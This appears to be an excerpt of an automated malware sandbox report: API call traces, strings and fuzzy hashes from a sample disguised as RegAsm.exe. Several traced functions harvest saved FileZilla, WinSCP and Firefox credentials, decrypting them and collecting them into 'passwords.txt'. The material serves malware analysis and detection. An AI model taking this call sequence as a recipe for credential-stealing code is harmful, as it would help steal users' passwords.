                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C97B
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040C9B8
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C9C7
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA53
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA6B
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA83
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA9B
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,Soft: FileZilla), ref: 0040CAB3
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,Host: ), ref: 0040CAC2
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00000000), ref: 0040CAD5
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00426D38), ref: 0040CAE4
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00000000), ref: 0040CAF7
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00426D3C), ref: 0040CB06
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,Login: ), ref: 0040CB15
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00000000), ref: 0040CB28
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00426D48), ref: 0040CB37
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,Password: ), ref: 0040CB46
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00000000), ref: 0040CB59
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00426D58), ref: 0040CB68
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00426D5C), ref: 0040CB77
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD60: lstrlenA.KERNEL32(004181A9,?,00000000,?,0041790D,004271B2,004271AF,00000000,?,00000000,004228A8,000000FF,?,004181A9), ref: 0040FD6B
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD60: lstrcpy.KERNEL32(00000000,004181A9), ref: 0040FDA2
                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 0040CBBB
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00417CD9,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CBD1
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040CC22
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$lstrlen$lstrcpy$mallocmemsetstrncpystrtok_s
                                                                                                                                                                                                                                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$niBkiBjiB$passwords.txt
                                                                                                                                                                                                                                                    • API String ID: 368316605-791898180
                                                                                                                                                                                                                                                    • Opcode ID: ce9cf5654bdfcda3da3b98d6d7313953ceb3fa3095390a9a2a39e93665ad34df
                                                                                                                                                                                                                                                    • Instruction ID: 201bcc1a07b8ed4ab31451ab60476e64b5eaca1d35b73e74bf71d04f9c26d2ba
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce9cf5654bdfcda3da3b98d6d7313953ceb3fa3095390a9a2a39e93665ad34df
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1B17075900219AACB14EBE5DC5AEEEBB38AF15704F50047EF50273192DF786A08CB68
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • NSS_Init.NSS3(00000000,00000000,00000000,00000009,?,?,?,?,00000000,00420448,000000FF,?,0040A6E9), ref: 0040926E
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,?,?,?,00000000,00420448,000000FF,?,0040A6E9), ref: 00409353
                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,00420448,000000FF,?,0040A6E9), ref: 0040935C
                                                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,00420448,000000FF,?,0040A6E9), ref: 0040936B
                                                                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 00409375
                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00420448,00000000,?,?,?,?,?,?,?,00000000,00420448,000000FF), ref: 00409388
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F,?,?,?,?,?,?,?,00000000,00420448,000000FF,?,0040A6E9), ref: 00409395
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00420448,000000FF,?,0040A6E9), ref: 0040939C
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,015D1EC8,?,?,?,?,?,?,?,00000000,00420448,000000FF,?,0040A6E9), ref: 004093AD
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(-00000010,015D1EE0,?,?,?,?,?,?,?,00000000,00420448,000000FF,?,0040A6E9), ref: 004093CB
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,015CF8A0), ref: 004093E1
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 004093F4
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00426A70), ref: 00409403
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 00409416
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00426A74), ref: 00409425
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,015CF8C0), ref: 00409435
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,-00000010), ref: 00409440
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00426A78), ref: 0040944F
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(-000000FE,015D1968,?,?,?,?,?,?,?,00000000,00420448,000000FF,?,0040A6E9), ref: 00409460
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000014,015D1648,?,?,?,?,?,?,?,00000000,00420448,000000FF,?,0040A6E9), ref: 00409471
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,015CF7A0), ref: 00409487
                                                                                                                                                                                                                                                      • Part of subcall function 00409110: memset.MSVCRT ref: 00409139
                                                                                                                                                                                                                                                      • Part of subcall function 00409110: lstrlenA.KERNEL32(00409493,00000001,?,00001FA0,00000000,00000000,?,00409493), ref: 00409156
                                                                                                                                                                                                                                                      • Part of subcall function 00409110: CryptStringToBinaryA.CRYPT32(00409493,00000000,?,00409493), ref: 0040915E
                                                                                                                                                                                                                                                      • Part of subcall function 00409110: PK11_GetInternalKeySlot.NSS3(?,00409493), ref: 0040916C
                                                                                                                                                                                                                                                      • Part of subcall function 00409110: PK11_Authenticate.NSS3(00000000,00000001,00000000,?,00409493), ref: 00409181
                                                                                                                                                                                                                                                      • Part of subcall function 00409110: PK11SDR_Decrypt.NSS3(00000000,?,00000000), ref: 004091B5
                                                                                                                                                                                                                                                      • Part of subcall function 00409110: memcpy.MSVCRT ref: 004091D1
                                                                                                                                                                                                                                                      • Part of subcall function 00409110: PK11_FreeSlot.NSS3 ref: 004091EB
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 0040949B
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00426A7C), ref: 004094AA
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(-000000FE,015D1648,?,?,?,?,?,?,?,?,00000000,00420448,000000FF,?,0040A6E9), ref: 004094BB
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000014,015CF7F0,?,?,?,?,?,?,?,?,00000000,00420448,000000FF,?,0040A6E9), ref: 004094CC
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,015D1E38), ref: 004094E2
                                                                                                                                                                                                                                                      • Part of subcall function 00409110: lstrcat.KERNEL32(004268C6,004268CA), ref: 0040920D
                                                                                                                                                                                                                                                      • Part of subcall function 00409110: PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00420448), ref: 00409214
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 004094F6
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00426A80), ref: 00409505
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00426A84), ref: 00409514
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(-00000002,015D1EC8,?,?,?,?,?,?,?,?,?,00000000,00420448,000000FF,?,0040A6E9), ref: 00409525
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(000000FF,?,?,?,?,?,?,?,00000000,00420448,000000FF,?,0040A6E9), ref: 00409539
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040958B
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00409594
                                                                                                                                                                                                                                                    • NSS_Shutdown.NSS3(?,?,?,?,?,?,00000000,00420448,000000FF,?,0040A6E9), ref: 0040959A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$FileK11_lstrcpy$Slotlstrlen$FreeHeapPointermemset$AllocAuthenticateBinaryCloseCryptDecryptHandleInitInternalProcessReadShutdownSizeStringmemcpy
                                                                                                                                                                                                                                                    • String ID: passwords.txt
                                                                                                                                                                                                                                                    • API String ID: 888326940-347816968
                                                                                                                                                                                                                                                    • Opcode ID: c46e45234dfa5e111babf87955bc521f9e39e8e30282efd66edc5953ebf13779
                                                                                                                                                                                                                                                    • Instruction ID: ca2ad9bb6b80040cc805ae6bc8cbf22e6a20f3758a562a1b8aced67113837563
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c46e45234dfa5e111babf87955bc521f9e39e8e30282efd66edc5953ebf13779
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CEB1C175900219EBDB14EBA0DC4AFEE7B79AF19704F10053DFA02B3291CB786A04CB65
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,Soft: WinSCP), ref: 0040C4BC
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,Host: ), ref: 0040C4CB
                                                                                                                                                                                                                                                    • RegGetValueA.ADVAPI32(0040EAF6,?,HostName,00000002,00000000,00000000,?), ref: 0040C4EF
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 0040C4FC
                                                                                                                                                                                                                                                    • RegGetValueA.ADVAPI32(0040EAF6,?,PortNumber,0000FFFF,00000000,00420D80,?), ref: 0040C527
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 0040C54D
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,:22), ref: 0040C569
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00426C68), ref: 0040C578
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,Login: ), ref: 0040C587
                                                                                                                                                                                                                                                    • RegGetValueA.ADVAPI32(0040EAF6,?,UserName,00000002,00000000,?,?), ref: 0040C5AB
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 0040C5B8
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00426C80), ref: 0040C5C7
                                                                                                                                                                                                                                                    • RegGetValueA.ADVAPI32(0040EAF6,?,Password,00000002,00000000,?,?), ref: 0040C5EB
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,Password: ), ref: 0040C5F6
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,0042695B), ref: 0040C608
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 0040C643
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00426C9C), ref: 0040C65D
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00426CA0), ref: 0040C66C
                                                                                                                                                                                                                                                    • RegEnumKeyExA.ADVAPI32(0040EAF6,00000001,?,00000104,00000000,00000000,00000000,00000000), ref: 0040C691
                                                                                                                                                                                                                                                      • Part of subcall function 00411A50: wsprintfA.USER32 ref: 00411A6B
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C6A2
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C6B0
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0040C6C8
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C718
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$Value$memset$Enumlstrlenwsprintf
                                                                                                                                                                                                                                                    • String ID: Host: $HostName$Login: $Password$Password: $PortNumber$Soft: WinSCP$UserName$passwords.txt
                                                                                                                                                                                                                                                    • API String ID: 2902345061-4040920679
                                                                                                                                                                                                                                                    • Opcode ID: e139fa6c5b6744e1113b7c42ec81520831a72db253033456269ab67ae5190ab9
                                                                                                                                                                                                                                                    • Instruction ID: 54c9f3f9f88f1a5b2f2c5dba5bbb759f0d4fd80bf01840b284e73203c45026b4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e139fa6c5b6744e1113b7c42ec81520831a72db253033456269ab67ae5190ab9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4817FB1A0022EABDB14EBE4CD85EFF7779EF48704F10455AF105B3180DA786A488B65
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB89: EnterCriticalSection.KERNEL32(6C75E370,?,?,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284), ref: 6C70AB94
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB89: LeaveCriticalSection.KERNEL32(6C75E370,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284,?,?,6C6F56F6), ref: 6C70ABD1
                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C6E4801
                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C6E4817
                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C6E482D
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6E484A
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB3F: EnterCriticalSection.KERNEL32(6C75E370,?,?,6C6D3527,6C75F6CC,?,?,?,?,?,?,?,?,6C6D3284), ref: 6C70AB49
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB3F: LeaveCriticalSection.KERNEL32(6C75E370,?,6C6D3527,6C75F6CC,?,?,?,?,?,?,?,?,6C6D3284,?,?,6C6F56F6), ref: 6C70AB7C
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C6E485F
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C6E487E
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C6E488B
                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C6E493A
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6E4956
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C6E4960
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C6E499A
                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C6E49C6
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C6F5EDB
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5E90: memset.VCRUNTIME140(ewsl,000000E5,?), ref: 6C6F5F27
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C6F5FB2
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C6E47FC
                                                                                                                                                                                                                                                    • MOZ_PROFILER_SHUTDOWN, xrefs: 6C6E4A42
                                                                                                                                                                                                                                                    • [I %d/%d] profiler_shutdown, xrefs: 6C6E4A06
                                                                                                                                                                                                                                                    • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C6E4812
                                                                                                                                                                                                                                                    • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C6E4828
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$free$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasememset
                                                                                                                                                                                                                                                    • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
                                                                                                                                                                                                                                                    • API String ID: 1340022502-4194431170
                                                                                                                                                                                                                                                    • Opcode ID: 3c9417af23fbec348dda23111d29f56c74674ed395e7ec0df7df8b9c944d078a
                                                                                                                                                                                                                                                    • Instruction ID: 9db6dd8205cf7bd39cde8ddb493e7eade9204d94e7a8d97278972027921f1b19
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c9417af23fbec348dda23111d29f56c74674ed395e7ec0df7df8b9c944d078a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4814870A0A1108BDB009FBCC84877A3775AF4A32CF940636D826A7B45DB71E955CB9E
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E4730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C6E44B2,6C75E21C,6C75F7F8), ref: 6C6E473E
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E4730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C6E474A
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C6E44BA
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C6E44D2
                                                                                                                                                                                                                                                    • InitOnceExecuteOnce.KERNEL32(6C75F80C,6C6DF240,?,?), ref: 6C6E451A
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C6E455C
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 6C6E4592
                                                                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(6C75F770), ref: 6C6E45A2
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000008), ref: 6C6E45AA
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000018), ref: 6C6E45BB
                                                                                                                                                                                                                                                    • InitOnceExecuteOnce.KERNEL32(6C75F818,6C6DF240,?,?), ref: 6C6E4612
                                                                                                                                                                                                                                                    • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C6E4636
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(user32.dll), ref: 6C6E4644
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C6E466D
                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C6E469F
                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C6E46AB
                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C6E46B2
                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C6E46B9
                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C6E46C0
                                                                                                                                                                                                                                                    • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C6E46CD
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 6C6E46F1
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C6E46FD
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                                                                                                                                                                                                    • String ID: Gul$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                                                                                                                                                                                                    • API String ID: 1702738223-3710063018
                                                                                                                                                                                                                                                    • Opcode ID: 94c959ddb160ab38cc061d62032ead993cd8066b9edc0c6462f08989882cb0e6
                                                                                                                                                                                                                                                    • Instruction ID: 758fe7e3f096bfa5386ec5c0ee655920cd8f5f2e267fd8d3a2ce02af1a3e8871
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94c959ddb160ab38cc061d62032ead993cd8066b9edc0c6462f08989882cb0e6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 986108B06093449FEB009FB1CC09BB57BB8EB4A308F84C56AE5049B641DFB1AA55CF95
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C71945E
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719470
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719482
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: __Init_thread_footer.LIBCMT ref: 6C71949F
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F70E
                                                                                                                                                                                                                                                    • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C71F8F9
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E6390: GetCurrentThreadId.KERNEL32 ref: 6C6E63D0
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E6390: AcquireSRWLockExclusive.KERNEL32 ref: 6C6E63DF
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E6390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C6E640E
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71F93A
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F98A
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F990
                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C71F994
